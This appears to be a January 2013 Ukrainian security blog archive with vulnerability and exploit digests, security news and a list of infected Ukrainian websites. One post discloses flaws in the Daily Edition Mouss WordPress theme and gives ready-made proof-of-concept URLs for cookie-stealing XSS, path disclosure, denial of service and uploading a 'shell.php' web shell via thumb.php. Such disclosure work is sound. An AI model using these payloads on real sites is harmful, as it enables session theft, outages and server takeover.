Архів за Січень, 2013

Численні уразливості в Google Chrome для Android

20:09 22.01.2013

Виявленні численні уразливості в Google Chrome для Android.

Уразливі версії: Google Chrome 18.0.

Численні способи обходу захисту і підвищення привілеїв.

  • Chrome for Android - Cookie theft from Chrome by malicious Android app (деталі)
  • Chrome for Android - Bypassing SOP for Local Files By Symlinks (деталі)
  • Chrome for Android - Android APIs exposed to JavaScript (деталі)
  • Chrome for Android - Download Function Information Disclosure (деталі)
  • Chrome for Android - UXSS via com.android.browser.application_id Intent extra (деталі)

Добірка експлоітів

17:20 22.01.2013

В даній добірці експлоіти в веб додатках:

  • Novell File Reporter Agent XML Parsing Remote Code Execution (деталі)
  • PostgreSQL for Linux Payload Execution Vulnerability (деталі)
  • Uploadify jQuery Generic File Upload (Metasploit) (деталі)
  • Serva v2.0.0 HTTP Server GET Remote Denial of Service Vulnerability (деталі)
  • Serva v2.0.0 DNS Server QueryName Remote Denial of Service Vulnerability (деталі)

IL, XSS, FPD, AoF, DoS і AFU уразливості в темі Daily Edition Mouss для WordPress

23:51 21.01.2013

У січні, 13.01.2013, я знайшов Information Leakage, Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості в темі Daily Edition Mouss для WordPress.

Раніше була оприлюднена SQL Injection уразливість в Daily Edition Mouss. В якій я знайшов багато нових дірок. Схоже, що це тема Daily Edition від WooThemes, про дірки в якій я писав в 2011 році. Тому окрім SQL injection, в цій темі багато інших уразливостей.

Information Leakage (SQL DB Structure Extraction) (WASC-13):

http://site/wp-content/themes/dailyedition-mouss/fiche-disque.php

XSS (WASC-08):

http://site/wp-content/themes/dailyedition-mouss/fiche-disque.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure (WASC-13):

http://site/wp-content/themes/dailyedition-mouss/

Окрім index.php також можливі FPD в інших php-файлах в цій темі.

XSS (WASC-08):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site.flickr.com&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

DoS (WASC-10):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site.flickr.com/big_file&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

Arbitrary File Upload (WASC-31):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://flickr.com.site.com/shell.php

AoF, DoS, AFU уразливості не працюють в останній версії теми (в якій я тестував їх). Це може бути в зв’язку з захистом від AFU дірки в TimThumb. Але вони повинні працювати в ранніх версіях цієї теми.

Уразливі всі версії теми Daily Edition Mouss для WordPress.

Інфіковані сайти №145

22:48 21.01.2013

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

  • http://vvadm.gov.ua - інфікований державний сайт - інфекція була виявлена 16.11.2012. Зараз сайт не входить до переліку підозрілих.
  • http://statuspress.com.ua - інфекція була виявлена 27.10.2012. Зараз сайт не входить до переліку підозрілих.
  • http://vsveta.com.ua - інфекція була виявлена 21.01.2013. Зараз сайт входить до переліку підозрілих.
  • http://troeschina.com - інфекція була виявлена 23.11.2012. Зараз сайт не входить до переліку підозрілих.
  • http://b-52.kiev.ua - інфекція була виявлена 23.11.2012. Зараз сайт не входить до переліку підозрілих.

Пошкодження пам’яті в Adobe Flash Player

20:17 21.01.2013

Виявлене пошкодження пам’яті в Adobe Flash Player.

Уразливі продукти: Adobe Flash Player 11.5, AIR 3.5.

Переповнення буфера у флеш плеєрі.

  • Security updates available for Adobe Flash Player (деталі)

Добірка уразливостей

17:26 21.01.2013

В даній добірці уразливості в веб додатках:

  • HP Operations Orchestration, Remote Execution of Arbitrary Code (деталі)
  • Remote code execution and other vulnerabilities in MAKETEXT macro (деталі)
  • Open-Realty CMS 3.x | Cross Site Request Forgery (CSRF) Vulnerability (деталі)
  • CubeCart 3.0.20 (3.0.x) and lower | Multiple Cross Site Scripting Vulnerabilities (деталі)
  • WingFTP Server Denial of Service Vulnerability (деталі)
  • CubeCart 3.0.20 (3.0.x) and lower | Arbitrary File Upload (деталі)
  • CubeCart 3.0.20 (3.0.x) and lower | Multiple SQL Injection Vulnerabilities (деталі)
  • Key Systems Electronic Key Lockers command injection and weak authentication vulnerabilities (деталі)
  • CubeCart 4.4.6 and lower | Open URL Redirection Vulnerability (деталі)
  • CubeCart 5.0.7 and lower | Open URL Redirection Vulnerability (деталі)

Уразливості в плагінах для WordPress №87

23:58 12.01.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Video Lead Form, Dailyedition mouss та Ads Box. Для котрих з’явилися експлоіти. Video Lead Form - це плагін для розміщення форми замовлення у відео, Dailyedition mouss - це тема движка, Ads Box - це плагін для розміщення реклами.

  • Video Lead Form Plugin Cross-Site Scripting Vulnerabilities which affects Wordpress URL (деталі)
  • WordPress Dailyedition-mouss SQL Injection (деталі)
  • WordPress Ads Box SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Новини: дірявий Ruby on Rails, бекдор у принтерах та Nokia

22:44 12.01.2013

За повідомленням www.xakep.ru, експлоіт для останніх уразливостей Ruby on Rails.

В останні кілька днів у фреймворку Ruby on Rails виявлені і закриті критичні уразливості з обробкою параметрів XML, що дозволяють зловмиснику здійснити віддалене виконання коду в будь-якому додатку Ruby on Rails, без аутентифікації. За приблизними оцінками, в Інтернеті зараз працює близько 240000 сайтів на Ruby on Rails.

За повідомленням www.opennet.ru, в прошивці мережевих принтерів Samsung і Dell знайдений бекдор.

Деякі моделі мережевих принтерів Samsung поставляються з прошивкою, у якій присутній жорстко прописаний прихований службовий сервіс, що дозволяє віддалено керувати налаштуваннями принтера і проводити його діагностику. Функція додана з метою спрощення сервісного обслуговування в процесі звертання в службу підтримки, але через те, що інформація тепер доступна публічно, даною можливістю можуть скористатися зловмисники для одержання повного контролю над пристроєм.

Проблемі також піддані принтери, що поставляються під брендом Dell, але зроблені за контрактом з компанією Samsung. Доступ до сервісу організований у вигляді відкритого на запис і читання SNMP-ідентифікатора, не видимого в загальному списку SNMP-перемінних, але він залишається активним навіть при відключенні SNMP у налаштуваннях принтера.

Бекдори знаходили у різних пристроях, популярних додатках та веб додатках, а тепер ось у принтерах :-) .

За повідомленням www.xakep.ru, Nokia розшифровує ваші HTTPS-з’єднання, але не потрібно турбуватися.

Індійський фахівець з ІТ безпеки Гауранг Пандіа є щасливим власником смартфона Nokia Asha 302 під операційною системою Series 40. У грудні минулого року Гауранг виявив, що браузер за замовчуванням у його смартфоні Nokia Browser (Xpress Browser) примусово направляє трафік через сервери компанії Nokia.

Здавалося б, що страшного у використанні проксі-сервера? Однак, Гауранг нещодавно одержав докази, що Nokia не просто перенаправляє і стискає трафік, але і розшифровує HTTPS на своєму проксі-сервері. Дослідник опублікував докази у своєму блозі. Компанія Nokia вже опублікувала відповідь і офіційно підтвердила цю інформацію.

Вийшов Google Chrome 24

20:16 12.01.2013

У січні, 10.01.2013, майже через півтора місяці після виходу Google Chrome 23, вийшов Google Chrome 24.

В браузері зроблено декілька нововведень та виправлені помилки. В тому числі оновлений Flash-плагін. А також виправлено 24 уразливості, з яких 11 позначені як небезпечні, 8 - помірні і 5 - незначні. Це значно більше ніж в попередній версії браузера.

З уразливостей, що мають статус небезпечних, дві проблеми виявлені в движку v8, три в системі для перегляду PDF, одна в коді доступу до файлів, одна в системі IPC, одна в коді роботи з DOM, одна в движку SVG і одна в коді позиціювання у відеопотоці.

Чимало з виправлених уразливостей виявлені за допомогою інструментарію address-sanitizer, призначеного для автоматизованого визначення фактів звертання до звільнених областей пам’яті, виходу за межі границь виділеного буфера і деяких інших типів помилок при роботі з пам’яттю.

Добірка експлоітів

16:27 12.01.2013

В даній добірці експлоіти в веб додатках:

  • Dolphin3D 1.52 / 1.60 Command Execution Vulnerability (деталі)
  • HP Data Protector DtbClsLogin Buffer Overflow (деталі)
  • Snare Agent Linux Password Disclosure / CSRF Vulnerabilities (деталі)
  • Apache/IIS/nginx Multiple HTTP Servers (Memory Exhaustion) DoS (деталі)
  • Cisco Wireless Lan Controller 7.2.110.0 Multiple Vulnerabilities (деталі)